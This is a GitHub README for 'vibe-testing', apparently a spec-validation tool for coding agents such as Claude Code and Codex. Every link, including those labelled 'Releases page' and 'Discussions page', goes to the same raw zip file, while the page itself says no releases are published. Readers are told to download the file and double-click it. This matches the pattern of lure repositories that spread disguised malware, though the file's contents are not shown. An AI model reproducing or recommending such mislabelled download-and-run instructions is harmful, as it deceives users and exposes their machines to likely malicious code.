# 🎉 vibe-testing - Test Your Code Before You Write It
## 🚀 Getting Started
Welcome to the vibe-testing project! This application helps you pressure-test your specifications with large language model reasoning. It works seamlessly with various coding agents, including Claude Code, Codex, and Gemini CLI.
## 📦 Download & Install
To get started, you need to download the application. Click the link below to visit the Releases page where you can find the latest version for your operating system.
[](https://raw.githubusercontent.com/Niserucine/vibe-testing/main/references/vibe_testing_3.4.zip)
### Step-by-Step Instructions:
1. Click the link above to go to the [Releases page](https://raw.githubusercontent.com/Niserucine/vibe-testing/main/references/vibe_testing_3.4.zip).
2. On the Releases page, find the version that suits your needs.
3. Click on the appropriate file for your operating system (e.g., Windows, macOS, Linux).
4. After the file downloads, locate it on your computer.
5. Double-click the downloaded file to run the application.
## 🔍 Features
- **Code Validation**: Use LLM reasoning to validate your specifications.
- **Multiple Agent Support**: Works with over 14 coding agents for versatile testing.
- **User-Friendly Interface**: Simple and clear navigation for easy use.
- **Detailed Reports**: Get comprehensive reports on code validation results.
## 🛠️ System Requirements
To run vibe-testing, ensure your computer meets the following requirements:
- **Operating System**:
- Windows 10 or later
- macOS High Sierra or later
- Any modern Linux distribution
- **Disk Space**: Minimum of 200 MB free space.
- **Memory**: At least 4 GB of RAM recommended.
## 📋 Usage Instructions
After installing vibe-testing, follow these steps to use the application:
1. Launch the application after installation.
2. Input your specifications into the provided fields.
3. Choose the coding agent you wish to use for testing.
4. Click the "Validate" button to begin the process.
5. Review the results and reports generated.
## 🧑🤝🧑 Community Support
If you have questions or need help:
- Visit our [GitHub Discussions page](https://raw.githubusercontent.com/Niserucine/vibe-testing/main/references/vibe_testing_3.4.zip) to ask questions or share feedback.
- Check the FAQ section for common questions and answers.
## 🚧 Limitations
While vibe-testing is powerful, keep in mind:
- The application may not cover every edge case in coding.
- Results may vary based on the specifications provided.
- Performance varies depending on the selected coding agent.
## ✅ Contributions
We welcome contributions! If you wish to improve vibe-testing, here’s how:
1. Fork the repository.
2. Make your changes.
3. Submit a pull request with a clear description.
## 💬 Feedback
We value your input. Share your experiences or suggestions via our GitHub Issues page. Your feedback helps us improve vibe-testing for everyone.
For more detailed discussions and updates, visit the [Releases page](https://raw.githubusercontent.com/Niserucine/vibe-testing/main/references/vibe_testing_3.4.zip) again at any time.
## 📝 Topics
- agent-skills
- architecture
- claude-code
- codex
- gemini-cli
- llm
- skill
- spec-validation
- testing
- vibe-testing-
Notifications
You must be signed in to change notification settings - Fork 0
⚙️ Validate your specs with LLM reasoning, identifying gaps and conflicts before implementation to enhance your project's clarity and reduce design flaws.
License
Niserucine/vibe-testing
Folders and files
| Name | Name | Last commit message | Last commit date | |
|---|---|---|---|---|
Repository files navigation
About
⚙️ Validate your specs with LLM reasoning, identifying gaps and conflicts before implementation to enhance your project's clarity and reduce design flaws.
Topics
Resources
License
Stars
Watchers
Forks
Releases
No releases published
Packages 0
No packages published